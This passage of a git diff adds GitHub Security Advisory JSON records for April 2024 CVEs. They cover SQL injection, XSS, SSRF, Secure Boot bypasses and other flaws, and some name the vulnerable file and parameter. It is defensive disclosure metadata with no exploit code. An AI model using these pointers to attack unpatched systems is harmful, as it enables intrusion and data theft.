Conferencing with Zoom plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.5 via the get_assign_host_id AJAX action. This makes it possible for authenticated attackers, with subscriber access or higher, to enumerate usernames, emails and IDs of all users on a site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2033" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3054964/video-conferencing-with-zoom-api/trunk?contextall=1&old=3048839&old_path=%2Fvideo-conferencing-with-zoom-api%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0966057b-8a3c-4d3c-84cb-cf36f1d97922?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-58mp-9hhc-gwv9/GHSA-58mp-9hhc-gwv9.json b/advisories/unreviewed/2024/04/GHSA-58mp-9hhc-gwv9/GHSA-58mp-9hhc-gwv9.json new file mode 100644 index 00000000000..9592ff6f5f8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-58mp-9hhc-gwv9/GHSA-58mp-9hhc-gwv9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58mp-9hhc-gwv9", + "modified": "2024-04-08T03:30:53Z", + "published": "2024-04-08T03:30:53Z", + "aliases": [ + "CVE-2024-23658" + ], + "details": "In camera driver, there is a possible use after free due to a logic error. This could lead to local denial of service with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23658" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-59vf-hjxc-f9c5/GHSA-59vf-hjxc-f9c5.json b/advisories/unreviewed/2024/04/GHSA-59vf-hjxc-f9c5/GHSA-59vf-hjxc-f9c5.json new file mode 100644 index 00000000000..88a508d3cbb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-59vf-hjxc-f9c5/GHSA-59vf-hjxc-f9c5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-59vf-hjxc-f9c5", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-20759" + ], + "details": "Adobe Commerce versions 2.4.6-p4, 2.4.5-p6, 2.4.4-p7, 2.4.7-beta3 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Confidentiality and integrity are considered high due to having admin impact.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20759" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/magento/apsb24-18.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5c83-88f2-q34h/GHSA-5c83-88f2-q34h.json b/advisories/unreviewed/2024/04/GHSA-5c83-88f2-q34h/GHSA-5c83-88f2-q34h.json new file mode 100644 index 00000000000..6fb21fba0e7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5c83-88f2-q34h/GHSA-5c83-88f2-q34h.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5c83-88f2-q34h", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52540" + ], + "details": "Vulnerability of improper authentication in the Iaware module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52540" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5cfg-q9x8-w2j7/GHSA-5cfg-q9x8-w2j7.json b/advisories/unreviewed/2024/04/GHSA-5cfg-q9x8-w2j7/GHSA-5cfg-q9x8-w2j7.json new file mode 100644 index 00000000000..299335f3050 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5cfg-q9x8-w2j7/GHSA-5cfg-q9x8-w2j7.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5cfg-q9x8-w2j7", + "modified": "2024-04-06T21:30:35Z", + "published": "2024-04-06T21:30:35Z", + "aliases": [ + "CVE-2024-3413" + ], + "details": "A vulnerability has been found in SourceCodester Human Resource Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file initialize/login_process.php. The manipulation of the argument hr_email/hr_password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259582 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3413" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Human-Resource-Information-System/Human-Resource-Information-System-01.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259582" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259582" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311431" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T19:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5g4m-3vpx-x6cw/GHSA-5g4m-3vpx-x6cw.json b/advisories/unreviewed/2024/04/GHSA-5g4m-3vpx-x6cw/GHSA-5g4m-3vpx-x6cw.json new file mode 100644 index 00000000000..dfff1315381 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5g4m-3vpx-x6cw/GHSA-5g4m-3vpx-x6cw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g4m-3vpx-x6cw", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31288" + ], + "details": "Server-Side Request Forgery (SSRF) vulnerability in RapidLoad RapidLoad Power-Up for Autoptimize.This issue affects RapidLoad Power-Up for Autoptimize: from n/a through 2.2.11.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31288" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/unusedcss/wordpress-rapidload-plugin-2-2-11-server-side-request-forgery-ssrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5g4q-rxw6-4rmm/GHSA-5g4q-rxw6-4rmm.json b/advisories/unreviewed/2024/04/GHSA-5g4q-rxw6-4rmm/GHSA-5g4q-rxw6-4rmm.json new file mode 100644 index 00000000000..af293d9f663 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5g4q-rxw6-4rmm/GHSA-5g4q-rxw6-4rmm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g4q-rxw6-4rmm", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28923" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28923" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28923" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5gmw-5676-jhvh/GHSA-5gmw-5676-jhvh.json b/advisories/unreviewed/2024/04/GHSA-5gmw-5676-jhvh/GHSA-5gmw-5676-jhvh.json new file mode 100644 index 00000000000..2f0a3c29630 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5gmw-5676-jhvh/GHSA-5gmw-5676-jhvh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5gmw-5676-jhvh", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26232" + ], + "details": "Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26232" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26232" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-843" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5gv7-f38h-r3v2/GHSA-5gv7-f38h-r3v2.json b/advisories/unreviewed/2024/04/GHSA-5gv7-f38h-r3v2/GHSA-5gv7-f38h-r3v2.json new file mode 100644 index 00000000000..f1693bf98c8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5gv7-f38h-r3v2/GHSA-5gv7-f38h-r3v2.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5gv7-f38h-r3v2", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-3355" + ], + "details": "A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/mod_users/controller.php?action=add. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259459.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3355" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-09" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310224" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5h96-vc53-5mqg/GHSA-5h96-vc53-5mqg.json b/advisories/unreviewed/2024/04/GHSA-5h96-vc53-5mqg/GHSA-5h96-vc53-5mqg.json new file mode 100644 index 00000000000..0be6f7b21d4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5h96-vc53-5mqg/GHSA-5h96-vc53-5mqg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5h96-vc53-5mqg", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29062" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29062" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29062" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5hc2-c69v-grvx/GHSA-5hc2-c69v-grvx.json b/advisories/unreviewed/2024/04/GHSA-5hc2-c69v-grvx/GHSA-5hc2-c69v-grvx.json new file mode 100644 index 00000000000..79881335efd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5hc2-c69v-grvx/GHSA-5hc2-c69v-grvx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5hc2-c69v-grvx", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28903" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28903" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28903" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-693" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5hf5-fh77-h2w2/GHSA-5hf5-fh77-h2w2.json b/advisories/unreviewed/2024/04/GHSA-5hf5-fh77-h2w2/GHSA-5hf5-fh77-h2w2.json new file mode 100644 index 00000000000..957dae12a5a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5hf5-fh77-h2w2/GHSA-5hf5-fh77-h2w2.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5hf5-fh77-h2w2", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-1664" + ], + "details": "The Responsive Gallery Grid WordPress plugin before 2.3.11 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1664" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/fc3beca7-af38-4ab2-b05f-13b47d042b85" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T05:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5hvp-4x73-f9p6/GHSA-5hvp-4x73-f9p6.json b/advisories/unreviewed/2024/04/GHSA-5hvp-4x73-f9p6/GHSA-5hvp-4x73-f9p6.json new file mode 100644 index 00000000000..008bc015456 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5hvp-4x73-f9p6/GHSA-5hvp-4x73-f9p6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5hvp-4x73-f9p6", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28897" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28897" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28897" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5mfc-7p58-rmq7/GHSA-5mfc-7p58-rmq7.json b/advisories/unreviewed/2024/04/GHSA-5mfc-7p58-rmq7/GHSA-5mfc-7p58-rmq7.json new file mode 100644 index 00000000000..757eadf347b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5mfc-7p58-rmq7/GHSA-5mfc-7p58-rmq7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mfc-7p58-rmq7", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-27910" + ], + "details": "A vulnerability was reported in some Lenovo Printers that could allow an unauthenticated attacker to reboot the printer without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27910" + }, + { + "type": "WEB", + "url": "https://iknow.lenovo.com.cn/detail/420425" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5mr4-7p75-327r/GHSA-5mr4-7p75-327r.json b/advisories/unreviewed/2024/04/GHSA-5mr4-7p75-327r/GHSA-5mr4-7p75-327r.json new file mode 100644 index 00000000000..ccb5d25f23b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5mr4-7p75-327r/GHSA-5mr4-7p75-327r.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mr4-7p75-327r", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2341" + ], + "details": "The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the keys parameter in all versions up to, and including, 1.6.7.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2341" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3054815%40simply-schedule-appointments%2Ftrunk&old=3054636%40simply-schedule-appointments%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4930b03-9142-464e-98ae-a910dfa46f2a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5p2g-jj66-wf2m/GHSA-5p2g-jj66-wf2m.json b/advisories/unreviewed/2024/04/GHSA-5p2g-jj66-wf2m/GHSA-5p2g-jj66-wf2m.json new file mode 100644 index 00000000000..ff5bb5db472 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5p2g-jj66-wf2m/GHSA-5p2g-jj66-wf2m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5p2g-jj66-wf2m", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26211" + ], + "details": "Windows Remote Access Connection Manager Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26211" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26211" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5p3v-8pvq-68mj/GHSA-5p3v-8pvq-68mj.json b/advisories/unreviewed/2024/04/GHSA-5p3v-8pvq-68mj/GHSA-5p3v-8pvq-68mj.json new file mode 100644 index 00000000000..7372368278a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5p3v-8pvq-68mj/GHSA-5p3v-8pvq-68mj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5p3v-8pvq-68mj", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26257" + ], + "details": "Microsoft Excel Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26257" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26257" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-415" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5pf6-gx59-rccf/GHSA-5pf6-gx59-rccf.json b/advisories/unreviewed/2024/04/GHSA-5pf6-gx59-rccf/GHSA-5pf6-gx59-rccf.json new file mode 100644 index 00000000000..4ae786b5472 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5pf6-gx59-rccf/GHSA-5pf6-gx59-rccf.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pf6-gx59-rccf", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-3532" + ], + "details": "A vulnerability classified as problematic has been found in Campcodes Complete Online Student Management System 1.0. Affected is an unknown function of the file attendance_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259902 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3532" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Student%20Management%20System/Complete%20Online%20Student%20Management%20System%20-%20vuln%205.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259902" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259902" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312523" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5pfq-gm94-5f9g/GHSA-5pfq-gm94-5f9g.json b/advisories/unreviewed/2024/04/GHSA-5pfq-gm94-5f9g/GHSA-5pfq-gm94-5f9g.json new file mode 100644 index 00000000000..7861a1e2e1e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5pfq-gm94-5f9g/GHSA-5pfq-gm94-5f9g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pfq-gm94-5f9g", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6964" + ], + "details": "The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.1.26 via the 'kadence_import_get_new_connection_data' AJAX action. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6964" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3019592%40kadence-blocks&old=2996625%40kadence-blocks&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b01ad77f-2349-48bb-b4e9-f7cbce435de9?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5pm4-pf2x-jxw4/GHSA-5pm4-pf2x-jxw4.json b/advisories/unreviewed/2024/04/GHSA-5pm4-pf2x-jxw4/GHSA-5pm4-pf2x-jxw4.json new file mode 100644 index 00000000000..51e0908c5d7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5pm4-pf2x-jxw4/GHSA-5pm4-pf2x-jxw4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pm4-pf2x-jxw4", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31286" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus.This issue affects WP Photo Album Plus: from n/a before 8.6.03.005.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31286" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-photo-album-plus/wordpress-wp-photo-album-plus-plugin-8-6-03-005-arbitrary-file-upload-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5q74-v533-4rqv/GHSA-5q74-v533-4rqv.json b/advisories/unreviewed/2024/04/GHSA-5q74-v533-4rqv/GHSA-5q74-v533-4rqv.json new file mode 100644 index 00000000000..531e259d4b8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5q74-v533-4rqv/GHSA-5q74-v533-4rqv.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5q74-v533-4rqv", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-30703" + ], + "details": "An arbitrary file upload vulnerability has been discovered 